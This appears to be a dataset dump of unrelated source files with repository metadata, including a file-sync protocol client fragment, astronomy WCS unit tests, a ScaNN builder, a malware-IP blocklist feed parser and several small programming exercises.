message.anpm.add_u32(1) # Send only one sub-message
# Calculate base messasge size.
message.size = message.anpm.get_payload_size()
#log.debug("Base message size: %i bytes." % ( message.size ))
# Calculate total sub-message size.
subm.size = subm.anpm.get_payload_size()
log.debug("Chunk sub-message size: %i bytes." % ( subm.size ))
total_size = message.size + subm.size
# Sent ANP transport header
#log.debug("Phase 2: sending ANPT header with data size %i." % ( total_size ))
self.writer.send_command_header(kanp.KANP_CMD_KFS_PHASE_2, total_size)
#log.debug("Phase 2: sent ANPT header, size %i." % ( total_size ))
# Send base message.
kanp.send_anpt_msg(self.writer, message.anpm)
# Send sub-message.
kanp.send_anpt_msg(self.writer, subm.anpm)
# get response
#log.debug("Phase 2: getting reply.")
h, m = kanp.get_anpt_all(self.reader)
#log.debug("ANP RESPONSE DUMP: %s" % (str(m.dump())))
#log.debug("Phase 2: got reply.")
if h.type == kanp.KANP_RES_FAIL:
raise kanp.KANPFailure(m.get_u32(), m.get_str())
assert h.type == kanp.KANP_RES_OK
def kfs_compute_hash(fd):
os.lseek(fd, 0, 0)
hash = hashlib.md5()
while 1:
data = os.read(fd, 1024*1024)
if len(data) == 0: break
hash.update(data)
return hash.digest()
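# The escaping helpers above are pure functions; a few illustrative calls:
#
#     kfs_convert_path_name('CON')       # -> '#067#079#078' (reserved name)
#     kfs_convert_path_name('a:b.txt')   # ':' is replaced with '#058'
#     get_kfs_skurl_subject(0, '')       # -> '1970-01-01 00h00m00 No subject'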
| [
"[email protected]"
] | |
4c59bf2329fd1567caddbca76105185740dad7e5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s680269618.py | 10f62cd0a31d38e548bfb5cbca9157ed13e880b2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | S = input()
if S[0] == S[1] and S[2] == S[3] and len(set(S)) == 2:
print('Yes')
elif S[0] == S[2] and S[1] == S[3] and len(set(S)) == 2:
print('Yes')
elif S[0] == S[3] and S[1] == S[2] and len(set(S)) == 2:
print('Yes')
else:
print('No')
| [
"[email protected]"
] | |
d4661de7781d69bf47240b7d4a8effe187d22ad9 | dea3e6876afe2fdae5b5b4a3f429cfce81b7a0a1 | /tests/test_frameSetUtils.py | 963a1cbd09e97306839efc9adabd9dc07e8a72a9 | [] | no_license | frossie-shadow/afw | 741f09cd202a5a9cc3b3943696a389b94a4ee404 | a1c44404738dcd73ff400e3bcd176ffe4dd51aab | refs/heads/master | 2021-01-19T17:49:51.003432 | 2017-08-19T03:11:56 | 2017-08-19T03:11:56 | 35,149,129 | 0 | 0 | null | 2015-05-06T08:54:49 | 2015-05-06T08:54:49 | null | UTF-8 | Python | false | false | 3,063 | py | from __future__ import absolute_import, division, print_function
import unittest
from lsst.afw.coord import IcrsCoord
from lsst.afw.geom import arcseconds, degrees, makeCdMatrix, Point2D
from lsst.afw.geom.detail import makeTanWcsMetadata, readFitsWcs, readLsstSkyWcs
import lsst.utils.tests
PrintStrippedNames = False
class FrameSetUtilsTestCase(lsst.utils.tests.TestCase):
"""This is sparse because SkyWcs unit tests test much of this package
"""
def setUp(self):
# arbitrary values
self.crpix = Point2D(100, 100)
self.crval = IcrsCoord(30 * degrees, 45 * degrees)
self.scale = 1.0 * arcseconds
def makeMetadata(self):
"""Return a WCS that is typical for an image
It will contain 32 cards:
- 14 standard WCS cards
- 15 standard cards:
- SIMPLE, BITPIX, NAXIS, NAXIS1, NAXIS2, BZERO, BSCALE
- DATE-OBS, MJD-OBS, TIMESYS
- EXPTIME
- 2 COMMENT cards
- INHERIT
- EXTEND
- LTV1 and LTV2, an IRAF convention LSST uses for image XY0
- 1 nonstandard card
"""
# arbitrary values
orientation = 0 * degrees
flipX = False
metadata = makeTanWcsMetadata(
crpix = self.crpix,
crval = self.crval,
cdMatrix = makeCdMatrix(scale=self.scale, orientation=orientation, flipX=flipX),
)
self.assertEqual(metadata.nameCount(), 14)
metadata.add("SIMPLE", True)
metadata.add("BITPIX", 16)
metadata.add("NAXIS", 2)
metadata.add("NAXIS1", 500)
metadata.add("NAXIS2", 200)
metadata.add("BZERO", 32768)
metadata.add("BSCALE", 1)
metadata.add("TIMESYS", "UTC")
metadata.add("UTC-OBS", "12:04:45.73")
metadata.add("DATE-OBS", "2006-05-20")
metadata.add("EXPTIME", 5.0)
metadata.add("COMMENT", "a comment")
metadata.add("COMMENT", "another comment")
metadata.add("EXTEND", True)
metadata.add("INHERIT", False)
metadata.add("LTV1", 5)
metadata.add("LTV2", -10)
metadata.add("ZOTHER", "non-standard")
return metadata
def testReadFitsWcsStripMetadata(self):
metadata = self.makeMetadata()
self.assertEqual(len(metadata.toList()), 32)
readFitsWcs(metadata, strip=False)
self.assertEqual(len(metadata.toList()), 32)
readFitsWcs(metadata, strip=True)
self.assertEqual(len(metadata.toList()), 18)
def testReadLsstSkyWcsStripMetadata(self):
metadata = self.makeMetadata()
self.assertEqual(len(metadata.toList()), 32)
readLsstSkyWcs(metadata, strip=False)
self.assertEqual(len(metadata.toList()), 32)
readLsstSkyWcs(metadata, strip=True)
self.assertEqual(len(metadata.toList()), 18)
class TestMemory(lsst.utils.tests.MemoryTestCase):
pass
def setup_module(module):
lsst.utils.tests.init()
if __name__ == "__main__":
lsst.utils.tests.init()
unittest.main()
| [
"[email protected]"
] | |
cafd330140fcfb6368723d583251829672ceb42d | a86599993fcca8fbe67ee02106281b5145f8db5e | /Laboratory 04/wdp_ftopt_l04z04pr.py | 37e25e77b5d7c40c7a9717f6d5240df8b50d219e | [] | no_license | pauliwu/Introduction-to-programming-in-python | 2747572c73a5559c0636523f7b75ae6c4e79d51e | cc4be2030d1a0798054ec2c6b30425fd77d3e117 | refs/heads/master | 2022-03-31T09:15:33.191768 | 2020-01-30T22:05:53 | 2020-01-30T22:05:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | '''
Write a program that asks the user for the radius of a circle and then
displays its area and circumference.
'''
def kolo(promien):
pi = 3.14
obwod = 2*pi*promien
pole = pi*promien**2
return pole, obwod
def main():
    r = float(input("Enter the circle radius in cm: "))
    p,o = kolo(r)
    print("Circumference = ", format(o,".1f"), "cm")
    print("Area = ", format(p,".1f"), "cm^2")
main()
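# A sample run (with pi approximated as 3.14 above), assuming input 1:
#
#     Enter the circle radius in cm: 1
#     Circumference =  6.3 cm
#     Area =  3.1 cm^2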
| [
"[email protected]"
] | |
761115aa3bdc406dc4f4c52ccd593a7e80e5d5c2 | c1ad248b8172c63f7756f14cb50f96cf726f90d0 | /tensorflow_examples/lite/model_maker/core/utils/ondevice_scann_builder.py | 9031bc02d9da8875c3b62beb2465f38818ce479a | [
"Apache-2.0"
] | permissive | slmsshk/examples | 846ec816c0c6d095cf49e4054df85a80375f4b7f | cd89a54b9e9577bebd22a9f083526ca8cb2b58b5 | refs/heads/master | 2022-08-16T19:59:03.695027 | 2022-08-07T07:30:14 | 2022-08-07T07:30:14 | 256,999,865 | 1 | 0 | Apache-2.0 | 2020-04-19T12:59:03 | 2020-04-19T12:59:01 | null | UTF-8 | Python | false | false | 1,856 | py | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ScannBuilder class for on-device applications."""
from google.protobuf import text_format
from scann.proto import scann_pb2
from scann.scann_ops.py import scann_builder
from scann.scann_ops.py import scann_ops_pybind
def builder(db, num_neighbors, distance_measure):
"""pybind analogue of builder() in scann_ops.py for the on-device use case."""
def builder_lambda(db, config, training_threads, **kwargs):
return scann_ops_pybind.create_searcher(db, config, training_threads,
**kwargs)
return OndeviceScannBuilder(
db, num_neighbors, distance_measure).set_builder_lambda(builder_lambda)
class OndeviceScannBuilder(scann_builder.ScannBuilder):
"""ScannBuilder for on-device applications."""
def create_config(self):
"""Creates the config."""
config = super().create_config()
config_proto = scann_pb2.ScannConfig()
text_format.Parse(config, config_proto)
# We don't support residual quantization on device so we need to disable
# use_residual_quantization.
if config_proto.hash.asymmetric_hash.use_residual_quantization:
config_proto.hash.asymmetric_hash.use_residual_quantization = False
return text_format.MessageToString(config_proto)
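# A minimal usage sketch mirroring the upstream ScaNN builder chain; `db` is
# assumed to be a [num_points, dim] float32 numpy array, and the tree/score
# parameters below are placeholders rather than recommended values:
#
#     searcher = (builder(db, num_neighbors=10, distance_measure='dot_product')
#                 .tree(num_leaves=100, num_leaves_to_search=10)
#                 .score_ah(dimensions_per_block=2)
#                 .build())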
| [
"[email protected]"
] | |
4a6b78de21ffdffea8c1583ad2df047b3419aa55 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_117/ch73_2019_04_04_18_01_16_761758.py | 2a91c18fcec24852640d02b74224cf472d03ccae | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | def remove_vogais(letras):
i=0
while i<len(letras):
if letras[i]== 'a' or letras[i] == 'e' or letras[i] == 'i' or letras[i] == 'o' or letras[i] == 'u':
del letras[i]
else:
i+=1
    return letras
| [
"[email protected]"
] | |
ba7639ad6a9c59bd8170920acdd5a7a269c096e7 | e5270423abf42482d956548333d4105d684cca31 | /trails/feeds/malc0de.py | 09d204f3da28e20de8dc18f4ac03427f7557e5e3 | [
"MIT"
] | permissive | ana2s007/maltrail | 2f5f556d222b6f1ba78affedce97400da125232a | 80979e76c33dca58313141a0e4a2626b609c3ebf | refs/heads/master | 2021-01-16T22:49:25.319116 | 2016-01-28T13:04:57 | 2016-01-28T13:04:57 | 50,610,789 | 1 | 0 | null | 2016-01-28T20:18:20 | 2016-01-28T20:18:20 | null | UTF-8 | Python | false | false | 689 | py | #!/usr/bin/env python
"""
Copyright (c) 2014-2016 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/malc0de.ipset"
__check__ = "malc0de"
__info__ = "malware distribution"
__reference__ = "malc0de.com"
def fetch():
retval = {}
content = retrieve_content(__url__)
if __check__ in content:
for line in content.split('\n'):
line = line.strip()
if not line or line.startswith('#') or '.' not in line:
continue
retval[line] = (__info__, __reference__)
return retval
| [
"[email protected]"
] | |
1a9fa3e8dcf8c60490f47495a2566b6a1f32a92a | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_009/ch90_2019_10_02_18_22_03_037134.py | fcae0603fe15fc773b6d8deebd33737ee6754ef6 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from datetime import datetime
def segundos_entre(x,y):
    t1 = datetime.strptime(x, "%H:%M:%S")
    t2 = datetime.strptime(y, "%H:%M:%S")
    a = (t2 - t1).seconds
    return f'The difference between times {x} and {y} is: {a} seconds'
| [
"[email protected]"
] | |
871eb6e8ee0778f806cecd0362c54b91bff6028c | d6e90e0326248389768fc9b6aece86b70e16f3e5 | /code_examples/gnuradio/module_fmcw/gr-radar/python/qa_FMCW_separate_IQ_cc.py | 7933b4c9829cbf1f1334c20a93dcfcf5f7cdd61a | [] | no_license | stwunsch/gsoc-proposal | 22d1d8f23b2f6008e59f80c4a51aab50a04b3e85 | 75d37e8a1e6d16ad0798bf3e7b4ab067d24f9a18 | refs/heads/master | 2021-01-19T16:57:41.145819 | 2014-04-14T16:15:08 | 2014-04-14T16:15:08 | 17,761,313 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,891 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2013 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, blocks
import radar_swig as radar
class qa_FMCW_separate_IQ_cc (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_001_t (self):
# set up fg
data = ( complex(1,1),complex(2,2),complex(3,3),complex(4,4),complex(5,5),complex(6,6) )
src = blocks.vector_source_c( data )
test = radar.FMCW_separate_IQ_cc(2)
snk1 = blocks.vector_sink_c(2)
snk2 = blocks.vector_sink_c(2)
snk3 = blocks.vector_sink_c(2)
self.tb.connect(src,test)
self.tb.connect((test,0),snk1)
self.tb.connect((test,1),snk2)
self.tb.connect((test,2),snk3)
self.tb.run ()
# check data
data1 = ( complex(1,1),complex(2,2) )
data2 = ( complex(3,3),complex(4,4) )
data3 = ( complex(5,5),complex(6,6) )
self.assertTupleEqual(data1,snk1.data())
self.assertTupleEqual(data2,snk2.data())
self.assertTupleEqual(data3,snk3.data())
if __name__ == '__main__':
gr_unittest.run(qa_FMCW_separate_IQ_cc, "qa_FMCW_separate_IQ_cc.xml")
| [
"[email protected]"
] | |
e0935743f7688c9951a2d83812994aded07c6dba | ce378bf28153d4d30cd53ec8684e8017abd0ac59 | /pythonProject/leetcode/Rotate Array.py | abac0295ceee22ace5ca239c758306f05baeca4e | [] | no_license | zzong2006/coding-problems-study | 5f006b39264cbe43d11db489ce8b716272329b6e | 9b3affbeb2ddfa673c1d879fb865408e34955c5c | refs/heads/master | 2023-04-07T12:47:41.646054 | 2021-04-08T05:02:33 | 2021-04-08T05:02:33 | 286,918,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | class Solution(object):
def rotate(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: None Do not return anything, modify nums in-place instead.
"""
print(nums)
        n = len(nums)
        k %= n
        # Three-reversal rotation: reverse the whole array, then un-reverse
        # the first k elements and the remaining n - k elements separately.
        for i in range(n // 2):
            nums[i], nums[n - i - 1] = nums[n - i - 1], nums[i]
        print(nums)
        # Reverse the first k elements back into order.
        for i in range(k // 2):
            nums[i], nums[k - i - 1] = nums[k - i - 1], nums[i]
        print(nums)
        # Reverse the tail nums[k:]; index i pairs with n - i + k - 1.
        for i in range(k, (n + k - 1) // 2 + 1):
            nums[i], nums[n - i + k - 1] = nums[n - i + k - 1], nums[i]
print(nums)
a = Solution()
a.rotate([1, 2, 3, 4, 5, 6, 7, 8, 9], k=3)
| [
"[email protected]"
] | |
a2c28ec47fbd74a3159ca3a127c49e89addf2c7d | 7b55cfc4ffa7678e4c7b8f2312831ebbd549e54f | /proj1/tests/other-tests/MINZ_tests/correct/dictionary.py | 3594fcbfb30b0ee6df0cd44083dd7c263c58907c | [] | no_license | czchen1/cs164-projects | 0d330efef85421e611a436b165428ba0ddfb3512 | a04cafbcaafd32e518227dacf89a6d7837bf9f57 | refs/heads/master | 2020-03-27T04:03:31.727524 | 2018-08-23T21:43:46 | 2018-08-23T21:43:46 | 145,909,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | dict = {'value' : 1, 'abc' : "aba", "ab" : "ababa", "abc" : 2}
print(dict["ab"]) #Expect 'ababa'
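# Note that the literal above defines "abc" twice, so the later value 2
# silently replaces "aba"; the lookup of "ab" is unaffected.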
| [
"[email protected]"
] |